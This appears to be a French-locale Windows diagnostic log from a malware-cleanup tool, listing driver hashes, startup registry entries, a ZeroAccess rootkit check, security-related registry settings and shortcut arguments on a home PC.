[MD5.02062C0B390B7729EDC9E69C680A6F3C] - [14/07/2009 01:19:47] - (.© Microsoft Corporation. - ATAPI IDE Miniport Driver.) - [23.56 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\atapi.sys
[MD5.059F00DEF82BF41E433B7ED465847726] - [11/09/2013 14:18:11] - (.© Microsoft Corporation. - ATAPI Driver Extension.) - [151.94 Ko] - (6.1.7601.18231) : C:\Windows\System32\Drivers\ataport.sys
[MD5.B8BD2BB284668C84865658C77574381A] - [14/07/2009 01:19:47] - (.© Microsoft Corporation. - CD-ROM File System Driver.) - [90 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\cdfs.sys
[MD5.F036CE71586E93D94DAB220D7BDF4416] - [21/11/2010 05:23:47] - (.© Microsoft Corporation. - SCSI CD-ROM Driver.) - [144 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\cdrom.sys
[MD5.9BB2EF44EAA163B29C4A4587887A0FE4] - [21/11/2010 05:24:32] - (.© Microsoft Corporation. - DFS Namespace Client Driver.) - [100 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\dfsc.sys
[MD5.97BFED39B6B79EB12CDDBFEED51F56BB] - [21/11/2010 05:23:47] - (.© Microsoft Corporation. - High Definition Audio Bus Driver.) - [119.5 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\hdaudbus.sys
[MD5.FA55C73D4AFFA7EE23AC4BE53B4592D3] - [14/07/2009 01:19:58] - (.© Microsoft Corporation. Tous droits réservés. - Pilote de port i8042.) - [103 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\i8042prt.sys
[MD5.AF9B39A7E7B6CAA203B3862582E9F2D0] - [14/07/2009 02:10:03] - (.© Microsoft Corporation. - IP Network Address Translator.) - [113.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\ipnat.sys
[MD5.10112D850C844606419C79EE24EE6016] - [15/06/2016 01:53:36] - (.© Microsoft Corporation. - Windows NT SMB Minirdr.) - [156 Ko] - (6.1.7601.23452) : C:\Windows\System32\Drivers\mrxsmb.sys
[MD5.F7309F42555F8AAB7144A51A1F2585B0] - [11/11/2015 11:35:15] - (.© Microsoft Corporation. Tous droits réservés. - Pilote NDIS 6.20.) - [928.44 Ko] - (6.1.7601.19030) : C:\Windows\System32\Drivers\ndis.sys
[MD5.E47D571FEC2C76E867935109AB2A770C] - [15/06/2016 01:52:44] - (.© Microsoft Corporation. - MBT Transport driver.) - [256 Ko] - (6.1.7601.23451) : C:\Windows\System32\Drivers\netbt.sys
[MD5.47B2D0B31BDC3EBE6090228E2BA3764D] - [09/03/2016 11:39:00] - (.© Microsoft Corporation. Tous droits réservés. - Pilote du système de fichiers NT.) - [1644.94 Ko] - (6.1.7601.19116) : C:\Windows\System32\Drivers\ntfs.sys
[MD5.0086431C29C35BE1DBC43F52CC273887] - [14/07/2009 02:00:41] - (.© Microsoft Corporation. Tous droits réservés. - Pilote de port parallèle.) - [95 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\parport.sys
[MD5.471815800AE33E6F1C32FB1B97C490CA] - [21/11/2010 05:24:33] - (.© Microsoft Corporation. - RAS L2TP mini-port/call-manager driver.) - [126.5 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\rasl2tp.sys
[MD5.548260A7B8654E024DC30BF8A7C5BAA4] - [14/07/2009 02:09:09] - (.© Microsoft Corporation. - SMB Transport driver.) - [91 Ko] - (6.1.7600.16385) : C:\Windows\System32\Drivers\smb.sys
[MD5.04ADD18EE5CC9FBEDAEC1DD1CD0CB45E] - [11/06/2014 08:08:43] - (.© Microsoft Corporation. Tous droits réservés. - Pilote TCP/IP.) - [1858.94 Ko] - (6.1.7601.18438) : C:\Windows\System32\Drivers\tcpip.sys
[MD5.AA77EB517D2F07A947294F260E3ACA83] - [11/11/2015 11:35:25] - (.© Microsoft Corporation. - TDI Translation Driver.) - [115.5 Ko] - (6.1.7601.19031) : C:\Windows\System32\Drivers\tdx.sys
[MD5.0D08D2F3B3FF84E433346669B5E0F639] - [21/11/2010 05:23:47] - (.© Microsoft Corporation. Tous droits réservés. - Pilote de cliché instantané du volume.) - [288.88 Ko] - (6.1.7601.17514) : C:\Windows\System32\Drivers\volsnap.sys

---------- | Locked Applications


---------- | Explorer.exe component call (Microsoft Files Whitelisted)


---------- | Svchost.exe component call (Microsoft Files Whitelisted)

(.Realtek Semiconductor Corp..-.Realtek(r) LFX/GFX DSP component.) - (11.0.6000.284) -- C:\Windows\system32\RtkAPO64.dll

---------- | ZeroAccess Check

[HKLM\Software\Classes\CLSID\{1108BE51-F58A-4CDA-BB99-7A0227D11D5E}\InProcServer32] : %systemroot%\system32\wbem\fastprox.dll
[HKLM\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] : %SystemRoot%\system32\shell32.dll
[HKLM\Software\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] : %systemroot%\system32\wbem\fastprox.dll
[HKLM\Software\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] : %systemroot%\system32\wbem\wbemess.dll
[HKLM\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] : %SystemRoot%\system32\shell32.dll
[HKLM\Software\WOW6432Node\Classes\CLSID\{1108BE51-F58A-4CDA-BB99-7A0227D11D5E}\InProcServer32] : %systemroot%\system32\wbem\fastprox.dll
[HKLM\Software\WOW6432Node\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] : %SystemRoot%\system32\shell32.dll
[HKLM\Software\WOW6432Node\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] : %systemroot%\system32\wbem\fastprox.dll
[HKLM\Software\WOW6432Node\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] : %SystemRoot%\system32\shell32.dll

---------- | Startings up

SpybotPostWindows10UpgradeReInstall - ("C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe" [HKU\S-1-5-18\...\Run]) - User: AUTORITE NT\Système
Sidebar - (%ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun [HKU\S-1-5-19\...\Run]) - User: AUTORITE NT\SERVICE LOCAL
Sidebar - (%ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun [HKU\S-1-5-20\...\Run]) - User: AUTORITE NT\SERVICE RÉSEAU
Facebook Update - ("C:\Users\Utilisateur\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver [HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\...\Run]) - User: Ordinateur\Utilisateur
ManyCam - ("C:\Program Files (x86)\ManyCam\ManyCam.exe" --silent [HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\...\Run]) - User: Ordinateur\Utilisateur
CCleaner Monitoring - ("C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR [HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\...\Run]) - User: Ordinateur\Utilisateur
Camfrog - ("C:\Program Files (x86)\Camfrog\Camfrog Video Chat\CamfrogNet.exe" 0 C:\Program Files (x86)\Camfrog\Camfrog Video Chat\Camfrog Video Chat.exe [HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\...\Run]) - User: Ordinateur\Utilisateur
SpybotPostWindows10UpgradeReInstall - ("C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe" [HKU\.DEFAULT\...\Run]) - User: .DEFAULT
McAfee Security Scan Plus - (C:\AdsFix\QUARAN~1\C\PROGRA~2\MCAFEE~1.ADS\311~1.334\SSSCHE~1.EXE  [Common Startup]) - User: Public
MSC - ("c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey [HKLM\...\Run]) - User: Public

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"Facebook Update"="C:\Users\Utilisateur\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver   
"ManyCam"="C:\Program Files (x86)\ManyCam\ManyCam.exe" --silent   
"CCleaner Monitoring"="C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR   
"Camfrog"="C:\Program Files (x86)\Camfrog\Camfrog Video Chat\CamfrogNet.exe" 0 C:\Program Files (x86)\Camfrog\Camfrog Video Chat\Camfrog Video Chat.exe   

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Command Processor]
"CompletionChar"=9   
"DefaultColor"=0   
"EnableExtensions"=1   
"PathCompletionChar"=9   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"MSC"="c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey   

[HKLM\Software\Microsoft\Command Processor]
"CompletionChar"=64   
"DefaultColor"=0   
"EnableExtensions"=1   
"PathCompletionChar"=64   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun   
"BlueStacks Agent"=C:\Program Files (x86)\BlueStacks\HD-Agent.exe   
"SunJavaUpdateSched"="C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"   

[HKLM\Software\WOW6432Node\Microsoft\Command Processor]
"CompletionChar"=64   
"DefaultColor"=0   
"EnableExtensions"=1   
"PathCompletionChar"=64   


---------- | Startings up registry ¦ Folder

[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe ARM] : "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"  
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Camfrog] : "C:\Program Files (x86)\Camfrog\Camfrog Video Chat\CamfrogNet.exe" 0 C:\Program Files (x86)\Camfrog\Camfrog Video Chat\Camfrog Video Chat.exe  
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\HotKeysCmds] : C:\Windows\system32\hkcmd.exe  [10/01/2012 22:43:08]
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IAStorIcon] : C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe "C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" 60  
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IgfxTray] : C:\Windows\system32\igfxtray.exe  [10/01/2012 22:43:30]
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LManager] : C:\Program Files (x86)\Launch Manager\LManager.exe  [07/02/2013 12:20:30]
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MSC] : "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey  
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Persistence] : C:\Windows\system32\igfxpers.exe  [10/01/2012 22:43:26]
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\RTHDVCPL] : C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s  
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Skype] : "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun  
[HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\WinampAgent] : "C:\Program Files (x86)\Winamp\winampa.exe"  

---------- | Other keys


[HKLM\System\CurrentControlSet\Control\SecurityProviders]
"SecurityProviders"=credssp.dll   

[HKLM\System\CurrentControlSet\Control\Terminal Server]
"RCDependentServices"=CertPropSvc
SessionEnv   
"NotificationTimeOut"=0   
"SnapshotMonitors"=1   
"ProductVersion"=5.1   
"AllowRemoteRPC"=0   
"DelayConMgrTimeout"=0   
"fDenyTSConnections"=1   
"StartRCM"=0   
"TSAdvertise"=0   
"DeleteTempDirsOnExit"=1   
"fSingleSessionPerUser"=1   
"PerSessionTempDir"=0   
"TSUserEnabled"=0   
"InstanceID"=b736ffeb-22c2-41a5-9303-ff58c45   
"fCredentialLessLogonSupported"=1   
"fCredentialLessLogonSupportedTSS"=1   
"fCredentialLessLogonSupportedKMRDP"=1   

[HKLM\System\CurrentControlSet\Control\Session Manager]
"CriticalSectionTimeout"=2592000   
"GlobalFlag"=0   
"HeapDeCommitFreeBlockThreshold"=0   
"HeapDeCommitTotalFreeThreshold"=0   
"HeapSegmentCommit"=0   
"HeapSegmentReserve"=0   
"ProcessorControl"=2   
"ResourceTimeoutCount"=648000   
"BootExecute"=autocheck autochk *

sdnclean64.exe   
"ExcludeFromKnownDlls"=   
"ObjectDirectories"=\Windows
\RPC Control   
"ProtectionMode"=1   
"NumberOfInitialSessions"=2   

[HKLM\System\CurrentControlSet\Control]
"PreshutdownOrder"=wuauserv
gpsvc
trustedinstaller   
"WaitToKillServiceTimeout"=200   
"CurrentUser"=USERNAME   
"BootDriverFlags"=0   
"ServiceControlManagerExtension"=%systemroot%\system32\scext.dll   
"SystemStartOptions"= NOEXECUTE=OPTIN   
"SystemBootDevice"=multi(0)disk(0)rdisk(0)partition(2)   
"FirmwareBootDevice"=multi(0)disk(0)rdisk(0)partition(1)   

[HKLM\System\CurrentControlSet\Control\lsa]
"auditbaseobjects"=0   
"auditbasedirectories"=0   
"crashonauditfail"=0   
"fullprivilegeauditing"=0x00   
"Bounds"=0x0030000000200000   
"LimitBlankPasswordUse"=1   
"NoLmHash"=1   
"Notification Packages"=scecli   
"Security Packages"=kerberos
msv1_0
schannel
wdigest
tspkg
pku2u
livessp   
"Authentication Packages"=msv1_0   
"LsaPid"=564   
"SecureBoot"=1   
"ProductType"=3   
"disabledomaincreds"=0   
"everyoneincludesanonymous"=0   
"forceguest"=0   
"restrictanonymous"=0   
"restrictanonymoussam"=1   


---------- | .LNK

C:\Users\Public\Desktop\Google Chrome.lnk        (--disable-quic) 
C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk        (SecurityScanner.dll) 
C:\Users\Utilisateur\AppData\Local\Google\Chrome\User Data\Lanceur d'applications Google Chrome.lnk        (--show-app-list) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk        (--disable-quic) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Excel.lnk        ("Microsoft Excel Starter 2010 90140066040C0000") 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet.lnk        (--disable-quic) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Lanceur d'applications Google Chrome.lnk        (--show-app-list --disable-quic) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Word.lnk        ("Microsoft Word Starter 2010 90140066040C0000") 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk        (--disable-quic) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Lanceur d'applications Google Chrome.lnk        (--show-app-list --disable-quic) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\SendTo\Skype.lnk        (/sendto:) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Accessories\Accessibility\Ease of Access.lnk        (/name Microsoft.EaseOfAccessCenter) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Applications Chrome\KProxy Background App.lnk        ( --profile-directory=Default --app-id=maicibfoihmlppibfkljeljefamfndbp) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Google Chrome\Lanceur d'applications Google Chrome.lnk        (--show-app-list) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk        (/name Microsoft.EaseOfAccessCenter) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Applications Chrome\KProxy Background App.lnk        ( --profile-directory=Default --app-id=maicibfoihmlppibfkljeljefamfndbp) 
C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Lanceur d'applications Google Chrome.lnk        (--show-app-list) 
C:\Users\Utilisateur\AppData\Roaming\ZHP\Quarantine\ManyCam\ManyCam\Reset settings.lnk        (--remove-settings) 
C:\Users\Utilisateur\Desktop\AdsFix_Donate.lnk        (https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=S3AQ8V3XRWWYN) 
C:\Users\Utilisateur\Desktop\Excel.lnk        ("Microsoft Excel Starter 2010 90140066040C0000") 
C:\Users\Utilisateur\Desktop\Lanceur d'applications Google Chrome.lnk        (--show-app-list --disable-quic) 
C:\Users\Utilisateur\Desktop\McAfee Security Scan Plus.lnk        (SecurityScanner.dll) 
C:\Users\Utilisateur\Desktop\Mises à jour.lnk        (startmenu) 
C:\Users\Utilisateur\Desktop\Word.lnk        ("Microsoft Word Starter 2010 90140066040C0000") 
C:\Users\Utilisateur\Desktop\Anciens raccourcis bureau\Internet.lnk        (--disable-quic) 
C:\Users\Utilisateur\Desktop\Anciens raccourcis bureau\Windows Update.lnk        (startmenu) 
C:\Users\Utilisateur\Local Settings\Google\Chrome\User Data\Lanceur d'applications Google Chrome.lnk        (--show-app-list) 
C:\Users\Utilisateur\Menu Démarrer\Programmes\Accessories\Accessibility\Ease of Access.lnk        (/name Microsoft.EaseOfAccessCenter) 
C:\Users\Utilisateur\Menu Démarrer\Programmes\Applications Chrome\KProxy Background App.lnk        ( --profile-directory=Default --app-id=maicibfoihmlppibfkljeljefamfndbp) 
C:\Users\Utilisateur\Menu Démarrer\Programmes\Google Chrome\Lanceur d'applications Google Chrome.lnk        (--show-app-list) 
C:\Users\Utilisateur\Menu Démarrer\Programs\Accessories\Accessibility\Ease of Access.lnk        (/name Microsoft.EaseOfAccessCenter) 
C:\Users\Utilisateur\Menu Démarrer\Programs\Applications Chrome\KProxy Background App.lnk        ( --profile-directory=Default --app-id=maicibfoihmlppibfkljeljefamfndbp) 
C:\Users\Utilisateur\Menu Démarrer\Programs\Google Chrome\Lanceur d'applications Google Chrome.lnk        (--show-app-list) 
C:\Users\Utilisateur\SendTo\Skype.lnk        (/sendto:) 
C:\ProgramData\Bureau\Google Chrome.lnk        (--disable-quic) 
C:\ProgramData\Bureau\McAfee Security Scan Plus.lnk        (SecurityScanner.dll) 
C:\ProgramData\Desktop\Google Chrome.lnk        (--disable-quic) 
C:\ProgramData\Desktop\McAfee Security Scan Plus.lnk        (SecurityScanner.dll) 
C:\ProgramData\Menu Démarrer\Windows Update.lnk        (startmenu) 
C:\ProgramData\Menu Démarrer\Programmes\Google Chrome.lnk        (--disable-quic) 
C:\ProgramData\Menu Démarrer\Programmes\Accessories\Mobility Center.lnk        (/open) 
C:\ProgramData\Menu Démarrer\Programmes\Accessories\Welcome Center.lnk        (%SystemRoot%\system32\OobeFldr.dll,ShowWelcomeCenter LaunchedBy_StartMenuShortcut) 
C:\ProgramData\Menu Démarrer\Programmes\Accessories\Accessibility\Speech Recognition.lnk        (-SpeechUX) 
C:\ProgramData\Menu Démarrer\Programmes\Accessories\System Tools\Resource Monitor.lnk        (/res) 
C:\ProgramData\Menu Démarrer\Programmes\Accessories\System Tools\Task Scheduler.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programmes\Administrative Tools\Computer Management.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programmes\Administrative Tools\Event Viewer.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programmes\Administrative Tools\Performance Monitor.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programmes\Administrative Tools\Task Scheduler.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programmes\Administrative Tools\Windows PowerShell Modules.lnk        (-NoExit -ImportSystemModules) 
C:\ProgramData\Menu Démarrer\Programmes\Catalyst Control Center\Aide.lnk        (Start Help -help) 
C:\ProgramData\Menu Démarrer\Programmes\Catalyst Control Center\CCC - Assistant.lnk        (Start Wizard) 
C:\ProgramData\Menu Démarrer\Programmes\Catalyst Control Center\CCC - Avancé.lnk        (Start Dashboard) 
C:\ProgramData\Menu Démarrer\Programmes\Catalyst Control Center\CCC.lnk        (Start CCC) 
C:\ProgramData\Menu Démarrer\Programmes\Catalyst Control Center\Redémarrer Runtime.lnk        (Restart) 
C:\ProgramData\Menu Démarrer\Programmes\Haali Media Splitter\Media Splitter Settings.lnk        (splitter.ax,Configure) 
C:\ProgramData\Menu Démarrer\Programmes\Java\A propos de Java.lnk        (-tab about) 
C:\ProgramData\Menu Démarrer\Programmes\Java\Rechercher les mises à jour.lnk        (-tab update) 
C:\ProgramData\Menu Démarrer\Programmes\Maintenance\Backup and Restore Center.lnk        (/name Microsoft.BackupAndRestore) 
C:\ProgramData\Menu Démarrer\Programmes\McAfee Security Scan Plus\Désinstaller.lnk        (C:\Program Files\McAfee Security Scan\3.11.334\McAfee.ico) 
C:\ProgramData\Menu Démarrer\Programmes\McAfee Security Scan Plus\McAfee Security Scan Plus.lnk        (SecurityScanner.dll) 
C:\ProgramData\Menu Démarrer\Programmes\Microsoft Office Starter (Français)\Microsoft Excel Starter 2010.lnk        ("Microsoft Excel Starter 2010 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programmes\Microsoft Office Starter (Français)\Microsoft Word Starter 2010.lnk        ("Microsoft Word Starter 2010 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programmes\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Bibliothèque multimédia Microsoft.lnk        ("Bibliothèque multimédia Microsoft 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programmes\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office 2010 Centre de téléchargement.lnk        ("Microsoft Office 2010 Centre de téléchargement 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programmes\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office Picture Manager.lnk        ("Microsoft Office Picture Manager 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programmes\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office Starter To-Go Device Manager 2010.lnk        ("Microsoft Office Starter To-Go Device Manager 2010 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programmes\Picasa 3\Configurer la Visionneuse de photos Picasa.lnk        (/reconfig) 
C:\ProgramData\Menu Démarrer\Programmes\Startup\McAfee Security Scan Plus.lnk        () 3.11.334h2�H�e  SSSCHE~1.EXEL﾿H�e�H�*��CSSScheduler.exe
C:\ProgramData\Menu Démarrer\Programmes\VideoLAN\Reset VLC media player preferences and cache files.lnk        (--reset-config --reset-plugins-cache vlc://quit) 
C:\ProgramData\Menu Démarrer\Programmes\VideoLAN\VLC media player - reset preferences and cache files.lnk        (--reset-config --reset-plugins-cache vlc://quit) 
C:\ProgramData\Menu Démarrer\Programmes\VideoLAN\VLC media player skinned.lnk        (-Iskins) 
C:\ProgramData\Menu Démarrer\Programs\Google Chrome.lnk        (--disable-quic) 
C:\ProgramData\Menu Démarrer\Programs\Accessories\Mobility Center.lnk        (/open) 
C:\ProgramData\Menu Démarrer\Programs\Accessories\Welcome Center.lnk        (%SystemRoot%\system32\OobeFldr.dll,ShowWelcomeCenter LaunchedBy_StartMenuShortcut) 
C:\ProgramData\Menu Démarrer\Programs\Accessories\Accessibility\Speech Recognition.lnk        (-SpeechUX) 
C:\ProgramData\Menu Démarrer\Programs\Accessories\System Tools\Resource Monitor.lnk        (/res) 
C:\ProgramData\Menu Démarrer\Programs\Accessories\System Tools\Task Scheduler.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programs\Administrative Tools\Computer Management.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programs\Administrative Tools\Event Viewer.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programs\Administrative Tools\Performance Monitor.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programs\Administrative Tools\Task Scheduler.lnk        (/s) 
C:\ProgramData\Menu Démarrer\Programs\Administrative Tools\Windows PowerShell Modules.lnk        (-NoExit -ImportSystemModules) 
C:\ProgramData\Menu Démarrer\Programs\Catalyst Control Center\Aide.lnk        (Start Help -help) 
C:\ProgramData\Menu Démarrer\Programs\Catalyst Control Center\CCC - Assistant.lnk        (Start Wizard) 
C:\ProgramData\Menu Démarrer\Programs\Catalyst Control Center\CCC - Avancé.lnk        (Start Dashboard) 
C:\ProgramData\Menu Démarrer\Programs\Catalyst Control Center\CCC.lnk        (Start CCC) 
C:\ProgramData\Menu Démarrer\Programs\Catalyst Control Center\Redémarrer Runtime.lnk        (Restart) 
C:\ProgramData\Menu Démarrer\Programs\Haali Media Splitter\Media Splitter Settings.lnk        (splitter.ax,Configure) 
C:\ProgramData\Menu Démarrer\Programs\Java\A propos de Java.lnk        (-tab about) 
C:\ProgramData\Menu Démarrer\Programs\Java\Rechercher les mises à jour.lnk        (-tab update) 
C:\ProgramData\Menu Démarrer\Programs\Maintenance\Backup and Restore Center.lnk        (/name Microsoft.BackupAndRestore) 
C:\ProgramData\Menu Démarrer\Programs\McAfee Security Scan Plus\Désinstaller.lnk        (C:\Program Files\McAfee Security Scan\3.11.334\McAfee.ico) 
C:\ProgramData\Menu Démarrer\Programs\McAfee Security Scan Plus\McAfee Security Scan Plus.lnk        (SecurityScanner.dll) 
C:\ProgramData\Menu Démarrer\Programs\Microsoft Office Starter (Français)\Microsoft Excel Starter 2010.lnk        ("Microsoft Excel Starter 2010 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programs\Microsoft Office Starter (Français)\Microsoft Word Starter 2010.lnk        ("Microsoft Word Starter 2010 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programs\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Bibliothèque multimédia Microsoft.lnk        ("Bibliothèque multimédia Microsoft 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programs\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office 2010 Centre de téléchargement.lnk        ("Microsoft Office 2010 Centre de téléchargement 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programs\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office Picture Manager.lnk        ("Microsoft Office Picture Manager 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programs\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office Starter To-Go Device Manager 2010.lnk        ("Microsoft Office Starter To-Go Device Manager 2010 90140066040C0000") 
C:\ProgramData\Menu Démarrer\Programs\Picasa 3\Configurer la Visionneuse de photos Picasa.lnk        (/reconfig) 
C:\ProgramData\Menu Démarrer\Programs\Startup\McAfee Security Scan Plus.lnk        () 3.11.334h2�H�e  SSSCHE~1.EXEL﾿H�e�H�*��CSSScheduler.exe
C:\ProgramData\Menu Démarrer\Programs\VideoLAN\Reset VLC media player preferences and cache files.lnk        (--reset-config --reset-plugins-cache vlc://quit) 
C:\ProgramData\Menu Démarrer\Programs\VideoLAN\VLC media player - reset preferences and cache files.lnk        (--reset-config --reset-plugins-cache vlc://quit) 
C:\ProgramData\Menu Démarrer\Programs\VideoLAN\VLC media player skinned.lnk        (-Iskins) 
C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk        (startmenu) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk        (--disable-quic) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk        (/open) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk        (%SystemRoot%\system32\OobeFldr.dll,ShowWelcomeCenter LaunchedBy_StartMenuShortcut) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Speech Recognition.lnk        (-SpeechUX) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk        (/res) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Task Scheduler.lnk        (/s) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk        (/s) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk        (/s) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk        (/s) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk        (/s) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk        (-NoExit -ImportSystemModules) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Catalyst Control Center\Aide.lnk        (Start Help -help) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Catalyst Control Center\CCC - Assistant.lnk        (Start Wizard) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Catalyst Control Center\CCC - Avancé.lnk        (Start Dashboard) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Catalyst Control Center\CCC.lnk        (Start CCC) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Catalyst Control Center\Redémarrer Runtime.lnk        (Restart) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Haali Media Splitter\Media Splitter Settings.lnk        (splitter.ax,Configure) 
